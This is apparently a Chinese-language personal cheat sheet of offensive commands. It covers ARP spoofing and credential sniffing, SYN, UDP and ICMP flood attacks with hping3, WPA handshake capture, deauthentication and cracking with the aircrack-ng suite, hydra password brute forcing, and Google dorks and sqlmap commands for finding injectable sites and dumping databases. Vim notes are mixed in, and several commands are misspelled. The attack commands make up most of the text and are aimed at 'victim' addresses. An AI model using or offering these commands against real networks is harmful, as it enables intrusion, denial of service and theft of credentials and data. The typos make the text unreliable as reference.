使用之前请更新镜像源
内网工具集使用
捕获网卡中的http图片
driftnet -i eth0
捕获账号密码
ettercap -Tq -i eth0
开启流量转发
echo 1 > /proc/sys/net/ipv4/ip_forward
查看转发
cat /proc/sys/net/ipv4/ip_forward
arp欺骗
arpspoof -i eth0 -t 192.168.受害者 192.168.网关
ping欺骗受害者假MAC
arping -s 伪造的MAC地址6位 -S 192.168.网关 192.168.受害者
占满对方带宽不一定有效SYN攻击方式TCP
hping3 --flood -S --rand-source -p 端口 受害者IP
udp攻击无需对方建立连接不一定有效原理如上
hping3 --rand-source --udp -p 端口 --flood 受害者IP
icmp攻击方式但是最大数据只能1400
hping3 --flood --rand-source --icmp -d 1400 受害者ip
web测试压力 cc攻击模拟1000人并发
ab -n 数据数量 -c 并发多少人 网页链接
启动服务
启动v2
systeam start v2ray
启动NGINX
systeam start nginx
扫描类
收集域名信息
dig @dns
路由跟踪
traceroute
局域网ip扫描
netdiscover
WiFi类工具
aircrack-ng
开启监听模式
airmon-ng start wlan0
查看监听
airmon-ng
查看附近WiFi
airodump-ng wlan0mon
抓取握手包
airodump-ng -c 信道 --bssid 指定mac地址 -w 指定握手包保存位置 wlan0mon
强制断开重新连接获取握手包
aireplay-ng -0 攻击次数 -a 设备BSSID wlan0mon
开始跑包
aircarck-ng -a2 -b 目标设备BSSID -w 字典 /tmp/1
aireplay-ng -3 -b 目标BSSID -h 在链接的设备 wlan0mon desktop桌面
hydra九头蛇暴力破解密码类
l 指定单个用户名
-L指定单个用户名字典
-p指定单个密码
-P指定单个密码字典
-s 端口
-vV显示详细
-t 线程数默认16
-r 反向登录
-e nsr 参数
-n 没有密码的账户
-R 继续上一次破解
hybra -l administrator -P 密码字典目录 smb://目标ip -vV
sshliunx远程服务22
rdp远程服务3389
smb文件共享445
mysql数据库3306
VIM
i 进入编辑模式
I 直接到首行输入
A直接到尾部输出
o到下一行进行输入
O到上一行进行输入
/ 向前查找
?向后进行查找
dd 删除一整行
shift+zz 保存并退出
sql注入类
inurl:asp?=id=1
inurl:php?=id=1
sqlmap -u 网站url
找到注入点
sqlmap -u 网页链接 --dbs
扫描到几个数据
sqlmap -u url -D 数据库名 --tables
扫描表
sqlmap -u url -D 数据库name -T 表名 --columns
扫描字段
qlmap -u url -D 数据库name -T 表名 -C 列名 --dump 1
sqlmap -u url -D 数据库name -T 表名 -C content --dump 2
show databases
查看所有数据库
order by
and 1=2 union select 1, version()
查询数据库版本
use dvwa
使用库
select database
()查看默认库
show tables
查看所有表
desc 表 查看表结构
show create table users\G
查看创建表sql语句
select user()
查看当前默认用户
select * from users\G;
以字段的方式查看所有users表
select * from information_schema.TABLES\G
select * from information_schema.COLUMNS\G
TABLE_SCHEMA 数据库名
TABLE_NMAE 表名
COLUMN_NAME 列名
distinct 过滤
sqlmap --batch -u 地址?id=1
评论区